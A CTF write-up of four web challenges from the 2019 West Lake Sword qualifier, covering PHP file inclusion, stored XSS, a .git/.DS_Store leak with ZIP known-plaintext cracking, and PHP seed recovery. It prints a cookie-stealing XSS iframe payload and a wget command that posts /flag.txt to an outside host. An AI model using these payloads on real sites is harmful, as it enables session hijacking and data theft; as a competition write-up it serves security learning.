Update (2019-04-11): Anheng's weekly practice platform now provides a reproduction environment: https://www.linkedbyx.com/taskinfo/516/detail

On 2019-04-07 we took part in the qualifiers of the 3rd West Lake Sword (西湖论剑) Cyber Security Skills Competition. Although we did not make it to the finals, I think some of the challenges are well worth a write-up.

Notes:

1. Many thanks to my two teammates @巫妖 and @京京 for the collaboration; our first time playing a CTF together went really smoothly.

2. Since Anheng shut down the target machines after the competition, for now I can only write this up from the material I still have on my computer. Many steps therefore have no screenshots yet; I will add them once Anheng releases a reproduction environment. Sorry about that.

3. Environment: Mac OS with two VMs, Win10 and Kali Linux, switching between the three depending on the tool needed.

Let's begin.

Challenge 1 (300 points) babyt3:

Screenshot: the challenge

Knowledge points: directory traversal and file inclusion.

Competition target: http://ctf3.linkedbyx.com:11310/

Reproduction target: http://61.164.47.198:10000

Steps:

1. Visit the target first; it turns out to be a blog-like website.

2. Look at the page source; there is a hint in it suggesting that the site's source code can be read:

include $_GET['file'];

I forget exactly what it said; I will correct this once the reproduction environment is available.

3. Visit /?file=php://filter/convert.base64-encode/resource=index.php and Base64-decode the result to get the source of index.php:

 <?php
 $a = @$_GET['file'];
 if (!$a) {
  $a = './templates/index.html';
 }
 echo 'include $_GET[\'file\']';
 if (strpos('flag',$a)!==false) {
  die('nonono');
 }
 include $a;
 ?>

 <!--hint: ZGlyLnBocA== -->

Looking at this source, there is a hint in it:

<!-- hint: ZGlyLnBocA== -->

4. Base64-decode it, and it turns out to be dir.php.

5. So let's read the source of dir.php as well: visit /?file=php://filter/convert.base64-encode/resource=dir.php

6. Base64-decode to get the source of dir.php:

 <?php
 $a = @$_GET['dir'];
 if(!$a){
  $a = '/tmp';
 }
 var_dump(scandir($a));

7. As you can see, this file lets us list any directory we like. Start with the root directory: visit /dir.php?dir=/

array(25) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(16) "ffffflag_1s_Her4" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(7) "my_init" [14]=> string(10) "my_service" [15]=> string(3) "opt" [16]=> string(4) "proc" [17]=> string(4) "root" [18]=> string(3) "run" [19]=> string(4) "sbin" [20]=> string(3) "srv" [21]=> string(3) "sys" [22]=> string(3) "tmp" [23]=> string(3) "usr" [24]=> string(3) "var" }

8. Luckily, the returned directory listing contains an entry named ffffflag_1s_Her4.

9. Running dir on ffffflag_1s_Her4 returns False, which means it is a file, so use the file-read trick on it: visit /?file=php://filter/convert.base64-encode/resource=/ffffflag_1s_Her4 (the 'flag' check in index.php never triggers because its strpos() arguments are reversed: it searches the literal string 'flag' for our whole path, which can never match.)

10. That yields a Base64 string; decode it to get the flag.

flag{*********************************}

Challenge 2 (300 points) Breakout:

Screenshot: the challenge

Knowledge points: stored XSS and bypassing its filter

Competition target: http://ctf1.linkedbyx.com:10351/

Reproduction target: http://61.164.47.198:10001/

Steps:

1. Visit the target; it asks for a login. Enter any username and password and you can log straight in.

2. Once inside there are three modules:

Message: a message board where you can leave and read messages.

Report: report a bug on a page to the administrator.

Exec: execute commands; it has an input box and an execute button, plus a button that clears all messages.

3. Start with the Message board. Trying it out, we suspect a stored XSS.

4. So let's craft an XSS payload and keep trying to bypass the filter.

5. Eventually the following payload bypasses the filter and the XSS fires. Of course, we first have to raise the input box's maximum length.

Screenshot: maximum length changed to 400
<iframe src="javas	cript:(function(){(new Image()).src='http://xss.zhaoj.in/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();">

The code above may be re-encoded by the page; you can open this text file to see it:
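As an added example (not from the original write-up), here is why the tab inside the payload's scheme defeats a substring blacklist and what a normalising check looks like; the naive filter is an assumed stand-in for the challenge's own, which we never saw, and the sample strings are constructed.

```python
"""Why 'javas<TAB>cript:' slips past a naive blacklist and how to check properly.

Added example, not part of the write-up.  naive_is_blocked() is an assumption
about what a substring blacklist looks like; browser_scheme() mirrors the
pre-processing of the WHATWG URL parser, which is why a browser still runs the
payload: tab, LF and CR are removed from a URL before the scheme is read."""
import re
from html import unescape

# Schemes treated as dangerous in an attribute like <iframe src> here.
DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}
# WHATWG URL parsing strips leading/trailing C0 controls and space ...
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
# ... and removes every ASCII tab, LF and CR anywhere in the input.
_TAB_OR_NEWLINE = re.compile(r"[\t\n\r]")
_SCHEME = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")


def naive_is_blocked(attr_value: str) -> bool:
    """The kind of check the challenge's filter appears to do:
    look for the literal scheme in the raw attribute value."""
    return "javascript:" in attr_value.lower()


def browser_scheme(attr_value: str) -> str:
    """Return the scheme a browser would actually dispatch on, or ''.

    1. The HTML parser entity-decodes the attribute value first.
    2. The URL parser strips C0 controls/space at both ends, drops
       tab/LF/CR everywhere, then reads the scheme up to ':'.
    """
    url = unescape(attr_value)
    url = url.strip(_C0_AND_SPACE)
    url = _TAB_OR_NEWLINE.sub("", url)
    m = _SCHEME.match(url)
    return m.group(1).lower() if m else ""


def hardened_is_blocked(attr_value: str) -> bool:
    """Decide on the normalised scheme, not on the raw characters."""
    return browser_scheme(attr_value) in DANGEROUS_SCHEMES


# Constructed samples; the first has the shape of the write-up's payload.
SAMPLES = [
    "javas\tcript:(function(){(new Image()).src='http://example.invalid/'})()",
    "  JaVa\nScRiPt:alert(1)",
    "java&#x09;script:alert(1)",  # the tab hidden behind an HTML entity
    "javascript:alert(1)",
    "https://example.invalid/page",
    "/relative/path",
]


def compare(samples=SAMPLES):
    """Return [(sample, naive_verdict, hardened_verdict), ...]."""
    return [(s, naive_is_blocked(s), hardened_is_blocked(s)) for s in samples]


if __name__ == "__main__":
    for sample, naive, hardened in compare():
        print(f"naive={naive!s:5} hardened={hardened!s:5} {sample!r}")
```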

6. Then go to the Report page and submit a report about the Message page. The captcha requires the first six characters to match, so just find a Python script to brute-force it; I grabbed one online. Source: https://blog.csdn.net/wwl1117/article/details/79104960

import string, hashlib

# First hex characters of the MD5 the captcha shows (placeholder here)
TARGET_PREFIX = "******"
# Candidate alphabet: digits, lowercase and uppercase letters
a = string.digits + string.ascii_lowercase + string.ascii_uppercase

def crack(prefix):
    # Try every 4-character string until its MD5 starts with the prefix
    for i in a:
        for j in a:
            for k in a:
                for m in a:
                    s = hashlib.md5((i + j + k + m).encode()).hexdigest()[:len(prefix)]
                    if s == prefix:
                        return i + j + k + m
    return None

print(crack(TARGET_PREFIX))

7. Submit the report; the XSS platform receives the cookie.

Screenshot: XSS platform

8. Then set the cookie, and we find we can submit commands on the Exec page. Let's first try the following command, which reads a local file and uploads it.

wget --post-file=/flag.txt http://xss.zhaoj.in/
Screenshot: testing this command

9. The request then arrives on the XSS platform.

Screenshot: the request arriving on the platform

10. Flag obtained~

Challenge 3 (300 points) Guess what the flag is:

Knowledge points: sensitive file disclosure and its exploitation (.DS_Store and Git), known-plaintext attack on an encrypted ZIP archive, PHP random-number seed recovery.

Competition target: http://ctf1.linkedbyx.com:10172/

Reproduction target: http://61.164.47.198:10002/

Steps:

1. Visit the target; it is a flashy online casino. Guessing at parameters, the page changes when name and code are passed: name is echoed back as-is, and code produces a "Wrong" message.

Screenshot: the flashy casino page

2. Fire up Uniscan on Kali Linux.

Screenshot: Uniscan

3. After the scan finishes, the results are as follows, including this finding: http://ctf1.linkedbyx.com:10172/.DS_Store

#
 Uniscan project
 http://uniscan.sourceforge.net/
 #
 V. 6.3
 Scan date: 7-4-2019 10:13:20
 | Domain: http://ctf1.linkedbyx.com:10172/
 | Server: Apache/2.4.18 (Ubuntu)
 | IP: 101.68.81.236
 |
 | Directory check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/flag/
 |                                                                                                   
 | File check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/.DS_Store
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/index.php

4. I found an exploitation tool online, https://github.com/lijiejie/ds_store_exp, and used it.

python /Users/jinzhao/Downloads/ds_store_exp-master/ds_store_exp.py "http://ctf1.linkedbyx.com:10172/.DS_Store"

The results are as follows:

5. This reveals http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e; opening it shows a page like this.

6. Let's keep scanning this directory for sensitive files. Uniscan again.

Screenshot: Uniscan scanning this subdirectory

7. No luck this time; it did not find anything.

#
 Uniscan project
 http://uniscan.sourceforge.net/
 #
 V. 6.3
 Scan date: 7-4-2019 10:44:33
 | Domain: http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/
 | Server: Apache/2.4.18 (Ubuntu)
 | IP: 101.68.81.236
 |
 | Directory check:
 |                                                                                                   
 | File check:
 | [+] CODE: 200 URL: http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/index.php
 |
 | Check robots.txt:
 |
 | Check sitemap.xml:
 ===================================================================================================
 Scan end date: 7-4-2019 10:48:45

8. So test by hand. Probing the .git directory no longer returns 404, which means there is a .git leak.

9. I found a tool online, https://github.com/cumtxujiabin/GitHack, and used it.

python /Users/jinzhao/Downloads/GitHack-master/GitHack.py http://ctf1.linkedbyx.com:10172/e10adc3949ba59abbe56e057f20f883e/.git/

10. Open the BackupForMySite.zip archive; it is encrypted. The Hint file inside is exactly what we need.

11. No panic, though: we have the plaintext of both index.php and lengzhu.jpg, and both are inside this encrypted archive. So we can use a known-plaintext attack to recover the decryption keys.

12. First we have to prepare a plaintext archive. Since there was a .DS_Store earlier, let's assume it was compressed on Mac OS, so compress index.php on Mac OS. If it is compressed with a different tool, the ARCHPR plaintext attack below errors out, saying it cannot find the compressed file.

13. Here I switch to Windows and use ARCHPR to decrypt. Fill in the settings and start.

14. When it reaches the password-search stage, do not let it continue; click Stop.

15. It reports that the encryption keys were recovered successfully.

16. It then prompts us to save the decrypted ZIP.

17. Open the decrypted ZIP and view the hint file.

18. Code obtained. Visit http://ctf1.linkedbyx.com:10172/?name=glzjin&code=9faedd5999937171912159d28b219d86, and we get the "redemption code".

19. Combining this with "flag saved in flag/seed.txt" from the hint above, try visiting /flag/seed.txt, but its content is "NAIVE", not the flag.

20. The page from step 18 changes every hour, so we boldly guess it is a random number generated from a fixed seed, with the number of rounds depending on the hour.

21. A search turns up https://www.openwall.com/php_mt_seed/, a tool that recovers the random-number seed from a random number, so let's use it.

22. First compile the tool on Kali Linux.

23. Then feed the Code from the page in as the random number and run it; it finds eight possible seeds.

Don't mind that this random number is already the next hour's.

24. Test visiting /flag/{seed}.txt; /flag/261530.txt, the first seed, is accessible and contains the flag!

25. Flag obtained~
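To make the seed-recovery step concrete, here is an added example (not from the write-up and not php_mt_seed's code) that re-implements PHP 7.1+ mt_srand()/mt_rand() and brute-forces a seed over a small window; the window and the round count are constructed for the demo, and the recovered seed is the one the write-up found.

```python
"""PHP >= 7.1 mt_srand()/mt_rand() (MT_RAND_MT19937 mode) re-implemented so the
idea behind php_mt_seed can be seen at small scale: with a fixed seed, any one
output identifies the seed, and a seed is cheap to brute-force once you can
reproduce the generator.  Added example, not php_mt_seed's code; the seed
window and round count below are constructed.  The fix is random_int()."""
N, M = 624, 397
MATRIX_A, UPPER, LOWER, MASK32 = 0x9908B0DF, 0x80000000, 0x7FFFFFFF, 0xFFFFFFFF


def _init_state(seed):
    """php_mt_initialize(): expand the 32-bit seed into 624 state words."""
    s = [seed & MASK32]
    for i in range(1, N):
        prev = s[-1]
        s.append((1812433253 * (prev ^ (prev >> 30)) + i) & MASK32)
    return s


def _reload(s):
    """php_mt_reload(): the MT19937 twist over the whole state, in place."""
    for i in range(N):
        y = (s[i] & UPPER) | (s[(i + 1) % N] & LOWER)
        s[i] = s[(i + M) % N] ^ (y >> 1) ^ (MATRIX_A if y & 1 else 0)


def _temper(y):
    """Standard MT19937 output tempering."""
    y ^= y >> 11
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    return (y ^ (y >> 18)) & MASK32


class PhpMtRand:
    """mt_srand($seed) followed by successive mt_rand() calls without a range."""
    def __init__(self, seed):
        self.state = _init_state(seed)
        _reload(self.state)
        self.index = 0

    def mt_rand(self):
        if self.index >= N:
            _reload(self.state)
            self.index = 0
        out = _temper(self.state[self.index])
        self.index += 1
        return out >> 1  # PHP drops the low bit and returns a 31-bit value


def nth_output(seed, rounds):
    """What mt_rand() returns on its `rounds`-th call after mt_srand(seed)."""
    rng = PhpMtRand(seed)
    for _ in range(rounds - 1):
        rng.mt_rand()
    return rng.mt_rand()


def recover_seed(observed, rounds, lo, hi):
    """Every seed in [lo, hi) whose `rounds`-th output equals `observed`:
    php_mt_seed's search over all 2^32 seeds, shrunk to a window so pure
    Python finishes in well under a second.  Seeds can collide, hence a list."""
    return [s for s in range(lo, hi) if nth_output(s, rounds) == observed]


def demo():
    """Constructed scenario: site seeded with 261530 (the seed found in the
    write-up) and, this hour, handing out its 3rd mt_rand() value."""
    leaked = nth_output(261530, 3)
    return recover_seed(leaked, 3, 261400, 261700)


if __name__ == "__main__":
    print("mt_srand(1); mt_rand() ->", PhpMtRand(1).mt_rand())  # 895547922
    print("candidate seeds:", demo())
```

The write-up's eight candidates come from the same collision effect: one 31-bit output does not pin a 32-bit seed uniquely, which is why a second output (or, as here, trying each candidate against /flag/{seed}.txt) is needed.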

Challenge 4 (300 points) Nobody solved it during the competition; not reproduced:

Target: http://ctf2.linkedbyx.com:10963/

Knowledge points: reflected XSS

Steps:

1. Open the target; it is a login page.

2. Look at the page source; there is a hint that seems to point to a registration page:

<!-- /main/register -->

3. So go to /main/register and register.

4. After logging in, it is another message board.

5. Try XSS; it does not work.

6. Look at the Report page and test for stored XSS; it does not work.

7. Look at the profile edit page; an image can be uploaded as the avatar.

8. Try all sorts of tricks to upload non-image files; no luck.

9. Testing the message board carefully, it has a reply feature, and after replying there is a preview of the earlier reply being quoted, which reveals a possibly exploitable reflected XSS point: /main/post?p=http://xss.zhaoj.in

10. But a content security policy gets in the way; no luck.

11. No idea how to proceed.